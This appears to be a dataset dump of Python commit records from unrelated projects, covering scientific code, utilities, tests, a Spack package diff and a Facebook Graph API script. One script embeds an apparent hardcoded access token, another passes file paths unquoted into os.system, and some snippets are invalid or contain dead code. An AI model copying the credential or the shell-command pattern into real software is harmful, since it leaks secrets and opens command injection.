return np.sum(r ** 2) + np.sum(Z.transpose((0, 2, 1)) @ linalg.solve(bigK[None, ...], Z)) + m * linalg.slogdet(bigK)[1]
def fit(trials, n_factors, **kwargs):
"""
:param trials: list of trials
:param n_factors: number of latent factors
:param kwargs
:return:
"""
config = get_config(**kwargs)
kwargs["omega_bound"] = config["omega_bound"]
params = get_params(trials, n_factors, **kwargs)
# initialization
click.echo("Initializing")
with timer() as elapsed:
initialize(trials, params, config)
click.secho("Initialized {:.2f}s".format(elapsed()), fg="green")
# fill arrays
fill_params(params)
params['R'] = kwargs['R']
dt = kwargs['dt']
var = kwargs['var']
scale = kwargs['scale']
fill_trials(trials)
make_prior(trials, n_factors=n_factors, dt=dt, var=var, scale=scale)
segments = cut_trials(trials, params, config)
y = np.stack([segment['y'] for segment in segments])
# fill_trials(segments)
# make_prior(segments, n_factors=n_factors, dt=kwargs['dt'], var=kwargs['var'], scale=kwargs['scale'])
# EM
click.echo("Fitting")
C, d, R = params['a'], params['b'], params['R']
n = config["window"]
t = np.arange(n) * dt
K = sekernel(t, var, scale)
z, C, d, R = em(y, C, d, R, K, config['max_iter'])
params['a'], params['b'], params['R'] = C, d, R
# Inference
# click.echo("Inferring")
# infer(trials, C, d, R)
# click.secho("Done", fg="green")
return y, z, C, d, R
| Python | 0 | |
5b20a487afa90c0d91a43d4d29526d352511316f | add utils.py with utilities | utils.py | utils.py | from csv import DictReader
import re
def read_csv(filename):
with open(filename) as csvfile:
return list(DictReader(csvfile, dialect='excel'))
def split_name(string):
surname, name = re.search(r'^([A-Z\'\.\s]+)\s(.+)$', string).groups()
return name, surname
def iterate_names(name, surname):
yield name, surname
while ' ' in name:
name = name.rsplit(' ', 1)[0]
yield name, surname
while ' ' in surname:
surname = surname.rsplit(' ', 1)[0]
yield name, surname
| Python | 0.000001 | |
89d8e6a8a422bade352d3bf94f2c59c1d0dc601b | Create dictionary.py | dictionary.py | dictionary.py | x = {'job': 'teacher', 'color': 'blue'} // Create a dictionary, list with defination
print(x['job']) // You will see 'teacher'
y = {'emotion': 'happy', 'reason': {'action': 'playing game', 'platform': 'PC'}}
print(y['reason']['action']) // You will see 'playing game'
| Python | 0.000096 | |
b08341d2822ad266e07d4104a45604ad9d5b504a | add unit test for text_analyzer | src/text_analyzer.py | src/text_analyzer.py | import os
import unittest
def analyze_text(filename):
lines = 0
chars = 0
with open(filename, 'r') as f:
for line in f:
lines += 1
chars += len(line)
return (lines, chars)
class TextAnalysisTests(unittest.TestCase):
"""Test for the ``analyze_test()`` function"""
def setUp(self):
self.filename = 'funfile.txt'
with open(self.filename, 'w') as f:
f.write('Spring is here. \n'
'As the birds sing. \n'
'And the flowers and bees. \n'
'In such a joy.')
def tearDown(self):
try:
os.remove(self.filename)
except:
pass
def test_function_runs(self):
analyze_text(self.filename)
def test_line_count(self):
self.assertEqual(analyze_text(self.filename)[0], 4)
def test_charactor_count(self):
self.assertEqual(analyze_text(self.filename)[1], 78)
def test_no_such_file(self):
with self.assertRaises(IOError):
analyze_text("foo")
def test_no_deletion(self):
analyze_text(self.filename)
self.assertTrue(os.path.exists(self.filename))
if __name__ == '__main__':
unittest.main()
| Python | 0.000002 | |
e1aa02badee2951f4f4aeeb09f37be030466e711 | Add pyupgrades.py | bin/pyupgrades.py | bin/pyupgrades.py | #!/usr/bin/env python
import xmlrpclib
import pip
import argparse
import re
from pkg_resources import parse_version
def version_number_compare(version1, version2):
return cmp(parse_version(version1), parse_version(version2))
def normalize(v):
return [int(x) for x in re.sub(r'(\.0+)*$','', v).split(".")]
return cmp(normalize(version1), normalize(version2))
package_format = '{dist.project_name} {dist.version}'
display_format = '{package:40} {message}'
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Process some integers.')
parser.add_argument('-a', '--all', dest='all', action='store_true', default=False)
parser.add_argument('-m', '--mirror', dest='mirror', default='http://pypi.python.org/pypi')
args = parser.parse_args()
if not args:
exit(-1)
pypi = xmlrpclib.ServerProxy(args.mirror)
for dist in pip.get_installed_distributions():
package_str = package_format.format(dist=dist)
available = pypi.package_releases(dist.project_name)
if not available:
# Try the capitalized package name
available = pypi.package_releases(dist.project_name.capitalize())
upgrade_available = True
if not available:
print display_format.format(package=package_str, message='no releases at pypi')
continue
comparison = version_number_compare(available[0], dist.version)
if comparison == 0:
if not args.all:
continue
print display_format.format(package=package_str, message='up to date')
elif comparison < 0:
print display_format.format(package=package_str, message='older version on pypi')
else:
print display_format.format(package=package_str, message='%s available' % available[0])
| Python | 0.000003 | |
7b09a44c7df8b2aa28e45c5382626c2f8c4bf61b | Add a script to convert from rst style files to markdown | bin/run_redpen.py | bin/run_redpen.py | #!/usr/bin/python
import os
import re
import shutil
from optparse import OptionParser
def main():
parser = OptionParser(usage="usage: %prog [options]",
version="%prog 1.0")
parser.add_option("-i", "--inputdir",
action="store",
dest="indir",
default="source",
help="specify the input directory containing rst files.")
parser.add_option("-o", "--outdir",
action="store",
dest="outdir",
default="build/mdfiles",
help="specify the output directory of markdownized files.")
(options, args) = parser.parse_args()
indir = options.indir
outdir = options.outdir
if os.path.exists(outdir) == True:
shutil.rmtree(outdir)
os.makedirs(outdir)
for root, dirs, files in os.walk(indir):
for file in files:
mdfile_pat = re.compile(".*\.rst")
if not mdfile_pat.search(file):
continue
fileroot, ext = os.path.splitext(file)
cmdline = "pandoc -r markdown -w rst %s -o %s" % (os.path.join(root, file),
outdir + "/" + fileroot + ".md")
os.system(cmdline)
if __name__ == '__main__':
main()
| Python | 0 | |
30c368f1794f7bbc4121f732143ac07e7148a3ca | Create KevinAndExpectation.py | Probability/KevinAndExpectation.py | Probability/KevinAndExpectation.py | # Importing standard libraries
import sys
from math import sqrt
# Parsing functions
def parseInt(stream):
return int(stream.readline().rstrip())
'''
Dynamically precomputing the summation series for N < 10^6 so that each test case
is solved in constnat time for any N less than 10^6. There fore for Task 1, this
solution takes O(1) time
'''
# Computing the summation series
def getL(N):
L = [0]*(N + 1)
L[1] = 1.0
for i in range(2, N + 1):
L[i] = L[i - 1] + sqrt(i * 4.0 - 3.0)
return L
'''
For N greater than 10^6 we take an approximation of the series since we have not
precomputed it already. This approximation was obtained from Wolfram alpha
'''
def getAns(N):
return (4.0/3.0) * (N ** 1.5)
# Main function for the program
if __name__ == "__main__":
stream = sys.stdin
T = parseInt(stream)
L = getL(1000000)
for i in range(T):
N = parseInt(stream)
if(N < 1000000):
summationN = L[N]
ans = 0.5 - 1.0/N + (0.5/N) * (summationN)
print ans
else:
summationN = getAns(N)
ans = 0.5 - 1.0/N + (0.5/N) * (summationN)
print ans
| Python | 0 | |
53b0d93a7a29121e9d24058bfe4b7ee3bd33f7ca | Add info for version 2.16 (#3601) | var/spack/repos/builtin/packages/ack/package.py | var/spack/repos/builtin/packages/ack/package.py | ##############################################################################
# Copyright (c) 2013-2016, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/llnl/spack
# Please also see the LICENSE file for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class Ack(Package):
"""ack 2.14 is a tool like grep, optimized for programmers.
Designed for programmers with large heterogeneous trees of
source code, ack is written purely in portable Perl 5 and takes
advantage of the power of Perl's regular expressions."""
homepage = "http://beyondgrep.com/"
url = "http://beyondgrep.com/ack-2.14-single-file"
version('2.16', '7085b5a5c76fda43ff049410870c8535', expand=False)
version('2.14', 'e74150a1609d28a70b450ef9cc2ed56b', expand=False)
depends_on('perl')
def install(self, spec, prefix):
mkdirp(prefix.bin)
ack = 'ack-{0}-single-file'.format(self.version)
# rewrite the script's #! line to call the perl dependency
shbang = '#!' + join_path(spec['perl'].prefix.bin, 'perl')
filter_file(r'^#!/usr/bin/env perl', shbang, ack)
install(ack, join_path(prefix.bin, "ack"))
set_executable(join_path(prefix.bin, "ack"))
| ##############################################################################
# Copyright (c) 2013-2016, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/llnl/spack
# Please also see the LICENSE file for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class Ack(Package):
"""ack 2.14 is a tool like grep, optimized for programmers.
Designed for programmers with large heterogeneous trees of
source code, ack is written purely in portable Perl 5 and takes
advantage of the power of Perl's regular expressions."""
homepage = "http://beyondgrep.com/"
url = "http://beyondgrep.com/ack-2.14-single-file"
version('2.14', 'e74150a1609d28a70b450ef9cc2ed56b', expand=False)
depends_on('perl')
def install(self, spec, prefix):
mkdirp(prefix.bin)
ack = 'ack-{0}-single-file'.format(self.version)
# rewrite the script's #! line to call the perl dependency
shbang = '#!' + join_path(spec['perl'].prefix.bin, 'perl')
filter_file(r'^#!/usr/bin/env perl', shbang, ack)
install(ack, join_path(prefix.bin, "ack"))
set_executable(join_path(prefix.bin, "ack"))
| Python | 0 |
3b30e8a66ca5a3c68055696c339a44fffc98afb3 | compute jaccard with numpy boradcasting | exercise/broadcast.py | exercise/broadcast.py | import numpy as np
# a = np.array([1.0, 2.0, 3.0])
# b = 2.0
# print(a * b)
# x = np.arange(4)
# xx = x.reshape(4,1)
#
# y = np.ones(5)
# x = np.array([1,2]).reshape((2,1))
# y =np.arange(4).reshape((1,4))
#
# print(x-y)
# from numpy import array, argmin, sqrt, sum
#
# observation = array([111.0,188.0])
#
# codes = array([[102.0, 203.0],
# [132.0, 193.0],
# [45.0, 155.0],
# [57.0, 173.0]])
#
# # observation = observation.reshape((1,-1))
# # distance = np.sqrt((observation[:,0] - codes[:,0]) ** 2 + (observation[:,1] - codes[:,1]) ** 2)
#
# diff = codes - observation
# distance = (diff **2).sum(axis=-1)
#
# min_ind = np.argmin(np.sqrt(distance))
# print(codes[min_ind])
gt_bboxes = np.array([[0,0,1,2],[1,0,3,4]]).reshape((-1,1,4))
anchors = np.array([[100,100,105,105],[2,1,3,3.5],[0,0,10,10]]).reshape((1,-1,4))
inter_ymin = np.maximum(gt_bboxes[:,:,0], anchors[:,:,0])
inter_xmin = np.maximum(gt_bboxes[:,:,1], anchors[:,:,1])
inter_ymax = np.minimum(gt_bboxes[:,:,2], anchors[:,:,2])
inter_xmax = np.minimum(gt_bboxes[:,:,3], anchors[:,:,3])
h = np.maximum(inter_ymax - inter_ymin, 0.)
w = np.maximum(inter_xmax - inter_xmin, 0.)
inter_area = h * w
anchors_area = (anchors[:,:,3] - anchors[:,:,1]) * (anchors[:,:,2] - anchors[:,:,0])
gt_bboxes_area = (gt_bboxes[:,:,3] - gt_bboxes[:,:,1]) * (gt_bboxes[:,:,2] - gt_bboxes[:,:,0])
union_area = anchors_area - inter_area + gt_bboxes_area
jaccard = inter_area/union_area
print(jaccard)
| Python | 0.999999 | |
d0d182605389ec73773df35b9e06455b9f9a2923 | add get_posts | facebook/get_posts.py | facebook/get_posts.py | """
A simple example script to get all posts on a user's timeline.
Originally created by Mitchell Stewart.
<https://gist.github.com/mylsb/10294040>
"""
import facebook
import requests
def some_action(post):
""" Here you might want to do something with each post. E.g. grab the
post's message (post['message']) or the post's picture (post['picture']).
In this implementation we just print the post's created time.
"""
print(post['created_time'])
# You'll need an access token here to do anything. You can get a temporary one
# here: https://developers.facebook.com/tools/explorer/
access_token = 'CAAHPNmH9dEUBAJ53c9925baOfzbjsCmaAujxZBSEBBpIKqxBwyqBTDMsQSZCsfxReqDlAIsyAWC6ZCtLMibt5G6AcHy2nDb2IC4pvFz0SMJWpnMJol3Rzvt80PKNz9IYGDHfNZBQTF3VhI36yDE8qiI2EzTK7LKuNLBEq3AugsSgXdFGtKcbP2UOtoZCZBaRSZBxHzph5yOmV5yflsJ5258'
# Look at Bill Gates's profile for this example by using his Facebook id.
user = 'BillGates'
graph = facebook.GraphAPI(access_token)
profile = graph.get_object(user)
posts = graph.get_connections(profile['id'], 'posts')
# Wrap this block in a while loop so we can keep paginating requests until
# finished.
while True:
try:
# Perform some action on each post in the collection we receive from
# Facebook.
[some_action(post=post) for post in posts['data']]
# Attempt to make a request to the next page of data, if it exists.
posts = requests.get(posts['paging']['next']).json()
except KeyError:
# When there are no more pages (['paging']['next']), break from the
# loop and end the script.
break
| Python | 0.000005 | |
419ca7099bf47ed00ede73d9de14690a643a3943 | Add data for integration testing of basic csv and crosstab formats | test/test_integration.py | test/test_integration.py | """Integrations tests for EcoData Retriever"""
import os
import shutil
from retriever import HOME_DIR
simple_csv = {'name': 'simple_csv',
'raw_data': "a,b,c\n1,2,3\n4,5,6",
'script': "shortname: simple_csv\ntable: simple_csv, http://example.com/simple_csv.txt",
'expect_out': "a,b,c\n1,2,3\n4,5,6"}
crosstab = {'name': 'crosstab',
'raw_data': "a,b,c1,c2\n1,1,1.1,1.2\n1,2,2.1,2.2",
'script': "shortname: crosstab\ntable: crosstab, http://example.com/crosstab.txt\n*column: a, int\n*column: b, int\n*ct_column: c\n*column: val, ct-double\n*ct_names: c1,c2",
'expect_out': "a,b,c,val\n1,1,c1,1.1\n1,1,c2,1.2\n1,2,c1,2.1\n1,2,c2,2.2"}
tests = [simple_csv, crosstab]
| Python | 0 | |
465fbc1657e90134323fd05ee4216da5af110ee4 | add tools | pycrawler/utils/tools.py | pycrawler/utils/tools.py | __author__ = 'mengpeng'
import time
def gethash(string, cap=0xffffffff):
return hash(string) & cap
def timestamp():
return time.strftime("%H:%M:%S", time.localtime(time.time()))
def datastamp():
return time.strftime("%Y-%m-%d", time.localtime(time.time()))
def fullstamp():
return time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(time.time())) | Python | 0.000001 | |
1983e84e41f6dfe8b54e4a7d7535d0b89f9dd58a | add an example of a client for a change | examples/parallel_client.py | examples/parallel_client.py | '''a bunch of examples of how to get a list of urls in parallel
each of them uses a different greenhouse api to retrieve a list of urls in
parallel and return a dictionary mapping urls to response bodies
'''
import urllib2
import greenhouse
# urllib2 obviously doesn't explicitly use greenhouse sockets, but we can
# override socket.socket so it uses them anyway
greenhouse.io.monkeypatch()
#
# simply schedule greenlets and use an event to signal the all clear
#
def _get_one(url, results, count, done_event):
results[url] = urllib2.urlopen(url).read()
if (len(results)) == count:
done_event.set() # wake up the original greenlet
def get_urls(urls):
count = len(urls)
results = {}
alldone = greenhouse.Event()
# each url gets its own greenlet to fetch it
for index, url in enumerate(urls):
greenhouse.schedule(_get_one, args=(url, results, count, alldone))
alldone.wait()
return results
#
# create two Queue objects, one for sending urls to be processed, another for
# sending back the results.
#
# this is a little awkward for this specific use case, but is more like how you
# might do it if you don't have a bounded set of inputs but will want to
# constantly send off jobs to be run.
#
def _queue_runner(in_q, out_q, stop):
while 1:
url = in_q.get()
if url is stop:
break
out_q.put((url, urllib2.urlopen(url).read()))
def get_urls_queue(urls, parallelism=None):
in_q = greenhouse.Queue()
out_q = greenhouse.Queue()
results = {}
stop = object()
parallelism = parallelism or len(urls)
for i in xrange(parallelism):
greenhouse.schedule(_queue_runner, args=(in_q, out_q, stop))
for url in urls:
in_q.put(url)
for url in urls:
url, result = out_q.get()
results[url] = result
for i in xrange(parallelism):
in_q.put(stop)
return results
#
# the Queue example above is basically a small reimplementation of Pools
#
def _pool_job(url):
return url, urllib2.urlopen(url).read()
def get_urls_pool(urls, parallelism=None):
pool = greenhouse.Pool(_pool_job, parallelism or len(urls))
pool.start()
results = {}
for url in urls:
pool.put(url)
for url in urls:
url, result = pool.get()
results[url] = result
pool.close()
return results
#
# this one returns a list of the results in an order corresponding to the
# arguments instead of a dictionary mapping them (to show off OrderedPool)
#
def _ordered_pool_job(url):
return urllib2.urlopen(url).read()
def get_urls_ordered_pool(urls, parallelism=None):
pool = greenhouse.OrderedPool(_ordered_pool_job, parallelism or len(urls))
pool.start()
for url in urls:
pool.put(url)
# OrderedPool caches out-of-order results and produces
# them corresponding to the order in which they were put()
results = [pool.get() for url in urls]
pool.close()
return results
#
# one last version, showcasing a further abstraction of OrderedPool
#
def get_urls_ordered_map(urls, parallelism=None):
return greenhouse.pool.map(
lambda u: urllib2.urlopen(u).read(),
urls,
pool_size=parallelism or len(urls))
| Python | 0.000001 | |
d8fc66417860e634bbb2a6d860628b645811d62c | Add WIP for Python example | examples/python/curieimu.py | examples/python/curieimu.py | #!/usr/bin/python
# Author: Ron Evans (@deadprogram)
# Copyright (c) 2016 Intel Corporation.
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE
import time, sys, signal, atexit
import pyupm_curieimu as curieimu
## Exit handlers ##
# This stops python from printing a stacktrace when you hit control-C
def SIGINTHandler(signum, frame):
raise SystemExit
# This lets you run code on exit,
# including functions from myAccelrCompass
def exitHandler():
print "Exiting"
sys.exit(0)
# Register exit handlers
atexit.register(exitHandler)
signal.signal(signal.SIGINT, SIGINTHandler)
while(1):
# Get the acceleration
curieimu.updateAccel();
outputStr = "acc: gX {0} - gY {1} - gZ {2}".format(
curieimu.getAccelX(), curieimu.getAccelY(),
curieimu.getAccelZ())
print outputStr
print " "
time.sleep(1)
| Python | 0 | |
b78fb81cba34992bb84ed3814aae04ce05ef913f | Add del-uri.py example script | examples/scripts/del-uri.py | examples/scripts/del-uri.py | #!/usr/bin/env python3
###
# (C) Copyright (2012-2015) Hewlett Packard Enterprise Development LP
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
###
import sys
if sys.version_info < (3, 4):
raise Exception("Must use Python 3.4 or later")
import hpOneView as hpov
from pprint import pprint
def acceptEULA(con):
# See if we need to accept the EULA before we try to log in
con.get_eula_status()
try:
if con.get_eula_status() is True:
print("EULA display needed")
con.set_eula('no')
except Exception as e:
print('EXCEPTION:')
print(e)
def login(con, credential):
# Login with givin credentials
try:
con.login(credential)
except:
print('Login failed')
def deluri(con, uri):
resource = con.delete(uri)
pprint(resource)
def main():
parser = argparse.ArgumentParser(add_help=True,
formatter_class=argparse.RawTextHelpFormatter,
description='''
Delete resource by URI
Usage: ''')
parser.add_argument('-a', dest='host', required=True,
help='''
HP OneView Appliance hostname or IP address''')
parser.add_argument('-u', dest='user', required=False,
default='Administrator',
help='''
HP OneView Username''')
parser.add_argument('-p', dest='passwd', required=True,
help='''
HP OneView Password''')
parser.add_argument('-c', dest='cert', required=False,
help='''
Trusted SSL Certificate Bundle in PEM (Base64 Encoded DER) Format''')
parser.add_argument('-y', dest='proxy', required=False,
help='''
Proxy (host:port format''')
parser.add_argument('-i', dest='uri', required=False,
help='''
URI of the resource to delete''')
args = parser.parse_args()
credential = {'userName': args.user, 'password': args.passwd}
con = hpov.connection(args.host)
sec = hpov.security(con)
if args.proxy:
con.set_proxy(args.proxy.split(':')[0], args.proxy.split(':')[1])
if args.cert:
con.set_trusted_ssl_bundle(args.cert)
login(con, credential)
acceptEULA(con)
deluri(con, args.uri)
if __name__ == '__main__':
import sys
import argparse
sys.exit(main())
# vim:set shiftwidth=4 tabstop=4 expandtab textwidth=79:
| Python | 0.000001 | |
5cf3ff125226ddbf2edfad9d3c0d6ea2d59618ce | add missing file | pygraphviz/tests/test.py | pygraphviz/tests/test.py | #!/usr/bin/env python
import sys
from os import path,getcwd
def run(verbosity=1,doctest=False,numpy=True):
"""Run PyGraphviz tests.
Parameters
----------
verbosity: integer, optional
Level of detail in test reports. Higher numbers provide more detail.
doctest: bool, optional
True to run doctests in code modules
"""
try:
import nose
except ImportError:
raise ImportError(\
"The nose package is needed to run the tests.")
sys.stderr.write("Running PyGraphiz tests:")
nx_install_dir=path.join(path.dirname(__file__), path.pardir)
# stop if running from source directory
if getcwd() == path.abspath(path.join(nx_install_dir,path.pardir)):
raise RuntimeError("Can't run tests from source directory.\n"
"Run 'nosetests' from the command line.")
argv=[' ','--verbosity=%d'%verbosity,
'-w',nx_install_dir,
'-exe']
if doctest:
argv.extend(['--with-doctest','--doctest-extension=txt'])
nose.run(argv=argv)
if __name__=="__main__":
run()
| Python | 0.000003 | |
2af53a39096c0eab9d95c304c802281fe3c580ae | Make JAX CompiledFunction objects pickle-able. | tests/pickle_test.py | tests/pickle_test.py | # Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for interoperability between JAX and pickling libraries."""
import pickle
import unittest
from absl.testing import absltest
try:
import cloudpickle
except ImportError:
cloudpickle = None
import jax
from jax.config import config
from jax import test_util as jtu
config.parse_flags_with_absl()
class CloudpickleTest(jtu.JaxTestCase):
@unittest.skipIf(cloudpickle is None, "Requires cloudpickle")
@unittest.skipIf(jax.lib._xla_extension_version < 31,
"Requires jaxlib 0.1.71")
def testPickleOfJittedFunctions(self):
@jax.jit
def f(x, y):
return x * y
@jax.jit
def g(z):
return f(z, z + 77) # noqa: F821
expected = g(32)
s = cloudpickle.dumps(g)
del f, g
g_unpickled = pickle.loads(s)
actual = g_unpickled(32)
self.assertEqual(expected, actual)
if __name__ == "__main__":
absltest.main(testLoader=jtu.JaxTestLoader())
| Python | 0.000032 | |
c4ee6bb374e07a07bac8b8f52cf94d7d474e0e33 | Fix typo in test comment | tests/test_config.py | tests/test_config.py | import os
from pathlib import Path
from rhizo.config import load_config
def check_config(config):
assert config.output_path == '/foo/bar'
assert config.sub_config.a == 'test'
assert config.sub_config.b == 2
assert round(config.sub_config.c - 3.14, 4) == 0
def _load_test_config(filename, use_environ=False):
"""Load a config file from the test_data subdirectory."""
path = Path(__file__).parent / 'test_data' / filename
return load_config(str(path), use_environ)
def test_text_config():
config = _load_test_config('sample_config.txt')
check_config(config)
def test_environment_config():
os.environ['RHIZO_SUB_CONFIG'] = 'a: override\nb: 3'
os.environ['RHIZO_OTHER_SETTING'] = 'from_env'
config = _load_test_config('sample_config.json', True)
# Not overridden in environment
assert config.output_path == '/foo/bar'
# Overridden in environment; dict value in environment
assert config.sub_config == { "a": "override", "b": 3 }
# Only specified in environment
assert config.other_setting == 'from_env'
def test_json_config():
# Make sure environment override only happens if requested
os.environ['RHIZO_OUTPUT_PATH'] = 'overridden'
config = _load_test_config('sample_config.json')
check_config(config)
def test_hjson_config():
config = _load_test_config('sample_config.hjson')
check_config(config)
def test_config_update():
config = _load_test_config('sample_config.hjson')
config.update(_load_test_config('update.hjson'))
assert config.output_path == '/foo/test'
assert config.sub_config.a == 'test'
assert config.sub_config.b == 3
| import os
from pathlib import Path
from rhizo.config import load_config
def check_config(config):
assert config.output_path == '/foo/bar'
assert config.sub_config.a == 'test'
assert config.sub_config.b == 2
assert round(config.sub_config.c - 3.14, 4) == 0
def _load_test_config(filename, use_environ=False):
"""Load a config file from the test_data subdirectory."""
path = Path(__file__).parent / 'test_data' / filename
return load_config(str(path), use_environ)
def test_text_config():
config = _load_test_config('sample_config.txt')
check_config(config)
def test_environment_config():
os.environ['RHIZO_SUB_CONFIG'] = 'a: override\nb: 3'
os.environ['RHIZO_OTHER_SETTING'] = 'from_env'
config = _load_test_config('sample_config.json', True)
# Not overridden in environmene
assert config.output_path == '/foo/bar'
# Overridden in environment; dict value in environment
assert config.sub_config == { "a": "override", "b": 3 }
# Only specified in environment
assert config.other_setting == 'from_env'
def test_json_config():
# Make sure environment override only happens if requested
os.environ['RHIZO_OUTPUT_PATH'] = 'overridden'
config = _load_test_config('sample_config.json')
check_config(config)
def test_hjson_config():
config = _load_test_config('sample_config.hjson')
check_config(config)
def test_config_update():
config = _load_test_config('sample_config.hjson')
config.update(_load_test_config('update.hjson'))
assert config.output_path == '/foo/test'
assert config.sub_config.a == 'test'
assert config.sub_config.b == 3
| Python | 0.000092 |
8006d142a00a6dae70850b3c9d816f745f252260 | create settings file with parent_separator setting | cms/settings.py | cms/settings.py | from django.conf import settings
PARENT_SEPARATOR = getattr(settings, 'MINICMS_PARENT_SEPARATOR', '/')
| Python | 0 | |
7c8d43b16d6b47555caeb00234590bc8d335ed71 | test markup | tests/test_markup.py | tests/test_markup.py | import pytest
from rich.markup import MarkupError, _parse, render
from rich.text import Span
def test_parse():
result = list(_parse("[foo]hello[/foo][bar]world[/][[escaped]]"))
expected = [
(None, "[foo]"),
("hello", None),
(None, "[/foo]"),
(None, "[bar]"),
("world", None),
(None, "[/]"),
("[", None),
("escaped", None),
("]", None),
]
assert result == expected
def test_render():
result = render("[bold]FOO[/bold]")
assert str(result) == "FOO"
assert result.spans == [Span(0, 3, "bold")]
def test_markup_error():
with pytest.raises(MarkupError):
assert render("foo[/]")
with pytest.raises(MarkupError):
assert render("foo[/bar]")
with pytest.raises(MarkupError):
assert render("[foo]hello[/bar]")
| Python | 0.000001 | |
93b2972c41855511cddf57029ab8fce0dccd9265 | add hashtable using open addressing | ds/hash.py | ds/hash.py | '''HashTable using open addressing'''
class HashTable(object):
def __init__(self):
self.size = 11
self.keys = [None] * self.size
self.data = [None] * self.size
def hash(self, key):
return key % self.size
def rehash(self, key):
return (key + 1) % self.size
def put(self, key, data):
slot = self.hash(key)
if self.keys[slot] is None:
self.keys[slot] = key
self.data[slot] = data
else:
while self.keys[slot] is not None:
slot = self.rehash(slot)
if self.keys[slot] == key:
self.data[slot] = data # replace
break
else:
self.keys[slot] = key
self.data[slot] = data
def get(self, key):
slot = self.hash(key)
if self.keys[slot] == key:
return self.data[slot]
else:
start_slot = slot
while self.keys[slot] != key:
slot = self.rehash(slot)
if slot == start_slot:
return None
else:
return self.data[slot]
def __setitem__(self, key, data):
self.put(key, data)
def __getitem__(self, key):
return self.get(key)
def __str__(self):
return ', '.join(map(str, enumerate(self.data)))
if __name__ == '__main__':
H = HashTable()
H[54] = "cat"
H[26] = "dog"
H[93] = "lion"
H[17] = "tiger"
H[77] = "bird"
H[31] = "cow"
H[44] = "goat"
H[55] = "pig"
H[20] = "chicken"
print(H)
H[9] = "duck"
print(H[9])
print(H)
| Python | 0.000001 | |
256e1bb8dd543051fe51b3b669ab4a10c0556f40 | add back pytext | tests/test_pytext.py | tests/test_pytext.py | import unittest
from pytext.config.field_config import FeatureConfig
from pytext.data.featurizer import InputRecord, SimpleFeaturizer
class TestPyText(unittest.TestCase):
def test_tokenize(self):
featurizer = SimpleFeaturizer.from_config(
SimpleFeaturizer.Config(), FeatureConfig()
)
tokens = featurizer.featurize(InputRecord(raw_text="At eight o'clock")).tokens
self.assertEqual(['at', 'eight', "o'clock"], tokens)
| Python | 0.000001 | |
ea0b0e3b3ca2b3ad51ae9640f7f58d9f2737f64c | Split out runner | dox/runner.py | dox/runner.py | # Copyright (c) 2014 Hewlett-Packard Development Company, L.P.
#
